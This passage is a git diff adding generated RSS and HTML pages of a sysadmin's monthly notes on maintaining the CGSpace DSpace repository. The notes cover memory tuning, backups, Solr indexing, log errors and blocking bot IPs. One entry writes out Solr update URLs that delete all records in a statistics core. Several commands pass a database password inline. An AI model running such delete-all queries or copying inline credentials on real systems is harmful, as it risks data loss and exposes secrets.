+&lt;li&gt;I&amp;rsquo;m not sure why Tomcat didn&amp;rsquo;t crash with an OutOfMemoryError&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core&lt;/li&gt;
+&lt;li&gt;The server only has 8GB of RAM so we&amp;rsquo;ll eventually need to upgrade to a larger one because we&amp;rsquo;ll start starving the OS, PostgreSQL, and command line batch processes&lt;/li&gt;
+&lt;li&gt;I ran all system updates on DSpace Test and rebooted it&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-07/</link>
+      <pubDate>Sun, 01 Jul 2018 12:56:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-07/</guid>
+      <description>&lt;h2 id=&#34;2018-07-01&#34;&gt;2018-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;During the &lt;code&gt;mvn package&lt;/code&gt; stage on the 5.8 branch I kept getting issues with java running out of memory:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;There is insufficient memory for the Java Runtime Environment to continue.
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-06/</link>
+      <pubDate>Mon, 04 Jun 2018 19:49:54 -0700</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-06/</guid>
+      <description>&lt;h2 id=&#34;2018-06-04&#34;&gt;2018-06-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Test the &lt;a href=&#34;https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560&#34;&gt;DSpace 5.8 module upgrades from Atmire&lt;/a&gt; (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/378&#34;&gt;#378&lt;/a&gt;)
+&lt;ul&gt;
+&lt;li&gt;There seems to be a problem with the CUA and L&amp;amp;R versions in &lt;code&gt;pom.xml&lt;/code&gt; because they are using SNAPSHOT and it doesn&amp;rsquo;t build&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-05/</link>
+      <pubDate>Tue, 01 May 2018 16:43:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-05/</guid>
+      <description>&lt;h2 id=&#34;2018-05-01&#34;&gt;2018-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+&lt;ul&gt;
+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E&lt;/li&gt;
+&lt;li&gt;http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;Then I reduced the JVM heap size from 6144 back to 5120m&lt;/li&gt;
+&lt;li&gt;Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the &lt;a href=&#34;https://github.com/ilri/rmg-ansible-public&#34;&gt;Ansible infrastructure scripts&lt;/a&gt; to support hosts choosing which distribution they want to use&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-04/</link>
+      <pubDate>Sun, 01 Apr 2018 16:13:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-04/</guid>
+      <description>&lt;h2 id=&#34;2018-04-01&#34;&gt;2018-04-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I tried to test something on DSpace Test but noticed that it&amp;rsquo;s down since god knows when&lt;/li&gt;
+&lt;li&gt;Catalina logs at least show some memory errors yesterday:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-03/</link>
+      <pubDate>Fri, 02 Mar 2018 16:07:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-03/</guid>
+      <description>&lt;h2 id=&#34;2018-03-02&#34;&gt;2018-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Export a CSV of the IITA community metadata for Martin Mueller&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-02/</link>
+      <pubDate>Thu, 01 Feb 2018 16:28:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-02/</guid>
+      <description>&lt;h2 id=&#34;2018-02-01&#34;&gt;2018-02-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter gave feedback on the &lt;code&gt;dc.rights&lt;/code&gt; proof of concept that I had sent him last week&lt;/li&gt;
+&lt;li&gt;We don&amp;rsquo;t need to distinguish between internal and external works, so that makes it just a simple list&lt;/li&gt;
+&lt;li&gt;Yesterday I figured out how to monitor DSpace sessions using JMX&lt;/li&gt;
+&lt;li&gt;I copied the logic in the &lt;code&gt;jmx_tomcat_dbpools&lt;/code&gt; provided by Ubuntu&amp;rsquo;s &lt;code&gt;munin-plugins-java&lt;/code&gt; package and used the stuff I discovered about JMX &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/&#34;&gt;in 2018-01&lt;/a&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2018</title>
+      <link>https://alanorth.github.io/cgspace-notes/2018-01/</link>
+      <pubDate>Tue, 02 Jan 2018 08:35:54 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2018-01/</guid>
+      <description>&lt;h2 id=&#34;2018-01-02&#34;&gt;2018-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time&lt;/li&gt;
+&lt;li&gt;I didn&amp;rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&amp;rsquo;t show anything out of the ordinary&lt;/li&gt;
+&lt;li&gt;The nginx logs show HTTP 200s until &lt;code&gt;02/Jan/2018:11:27:17 +0000&lt;/code&gt; when Uptime Robot got an HTTP 500&lt;/li&gt;
+&lt;li&gt;In dspace.log around that time I see many errors like &amp;ldquo;Client closed the connection before file download was complete&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;And just before that I see this:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Ah hah! So the pool was actually empty!&lt;/li&gt;
+&lt;li&gt;I need to increase that, let&amp;rsquo;s try to bump it up from 50 to 75&lt;/li&gt;
+&lt;li&gt;After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&amp;rsquo;t know what the hell Uptime Robot saw&lt;/li&gt;
+&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&amp;rsquo;s Encrypt if it&amp;rsquo;s just a handful of domains&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-12/</link>
+      <pubDate>Fri, 01 Dec 2017 13:53:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-12/</guid>
+      <description>&lt;h2 id=&#34;2017-12-01&#34;&gt;2017-12-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Uptime Robot noticed that CGSpace went down&lt;/li&gt;
+&lt;li&gt;The logs say &amp;ldquo;Timeout waiting for idle object&amp;rdquo;&lt;/li&gt;
+&lt;li&gt;PostgreSQL activity says there are 115 connections currently&lt;/li&gt;
+&lt;li&gt;The list of connections to XMLUI and REST API for today:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-11/</link>
+      <pubDate>Thu, 02 Nov 2017 09:37:54 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-11/</guid>
+      <description>&lt;h2 id=&#34;2017-11-01&#34;&gt;2017-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;The CORE developers responded to say they are looking into their bot not respecting our robots.txt&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-11-02&#34;&gt;2017-11-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
+0
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-10/</link>
+      <pubDate>Sun, 01 Oct 2017 08:07:54 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-10/</guid>
+      <description>&lt;h2 id=&#34;2017-10-01&#34;&gt;2017-10-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Peter emailed to point out that many items in the &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/2703&#34;&gt;ILRI archive collection&lt;/a&gt; have multiple handles:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;There appears to be a pattern but I&amp;rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine&lt;/li&gt;
+&lt;li&gt;Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>CGIAR Library Migration</title>
+      <link>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</link>
+      <pubDate>Mon, 18 Sep 2017 16:38:35 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/cgiar-library-migration/</guid>
+      <description>&lt;p&gt;Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called &lt;em&gt;CGIAR System Organization&lt;/em&gt;.&lt;/p&gt;</description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/categories/notes/page/1/index.html b/docs/categories/notes/page/1/index.html
new file mode 100644
index 000000000..16efd964c
--- /dev/null
+++ b/docs/categories/notes/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/categories/notes/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/categories/notes/">
+  </head>
+</html>
diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html
new file mode 100644
index 000000000..eeadd59a4
--- /dev/null
+++ b/docs/categories/notes/page/2/index.html
@@ -0,0 +1,434 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-09/">September, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-09-01T09:41:36+03:00">Thu Sep 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-09-01">2022-09-01</h2>
+<ul>
+<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li>
+<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change
+<ul>
+<li>The submission works as expected</li>
+</ul>
+</li>
+<li>Start debugging some region-related issues with csv-metadata-quality
+<ul>
+<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li>
+<li>I also fixed a few bugs and improved the region-matching logic</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-08/">August, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-08-01T10:22:36+03:00">Mon Aug 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-08-01">2022-08-01</h2>
+<ul>
+<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-07/">July, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-07-02T14:07:36+03:00">Sat Jul 02, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-07-02">2022-07-02</h2>
+<ul>
+<li>I learned how to use the Levenshtein functions in PostgreSQL
+<ul>
+<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li>
+<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-06/">June, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-06-06T09:01:36+03:00">Mon Jun 06, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-06-06">2022-06-06</h2>
+<ul>
+<li>Look at the Solr statistics on CGSpace
+<ul>
+<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li>
+<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li>
+</ul>
+</li>
+<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li>
+<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li>
+<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+<ul>
+<li>There seem to be many more of these:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-05/">May, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-05-04T09:13:39+03:00">Wed May 04, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-05-04">2022-05-04</h2>
+<ul>
+<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+<ul>
+<li>18.207.136.176</li>
+<li>185.189.36.248</li>
+<li>50.118.223.78</li>
+<li>52.70.76.123</li>
+<li>3.236.10.11</li>
+</ul>
+</li>
+<li>Looking at the Solr statistics for 2022-04
+<ul>
+<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li>
+<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li>
+<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li>
+<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li>
+</ul>
+</li>
+<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+  <a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-03-01">2022-03-01</h2>
+<ul>
+<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-02-01T14:06:54+02:00">Tue Feb 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-02-01">2022-02-01</h2>
+<ul>
+<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR
+<ul>
+<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li>
+<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li>
+<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li>
+<li>We agreed to try to do more alignment of affiliations/funders with ROR</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-01/">January, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-01-01T15:20:54+02:00">Sat Jan 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-01-01">2022-01-01</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-12/">December, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-12-01T16:07:07+02:00">Wed Dec 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-12-01">2021-12-01</h2>
+<ul>
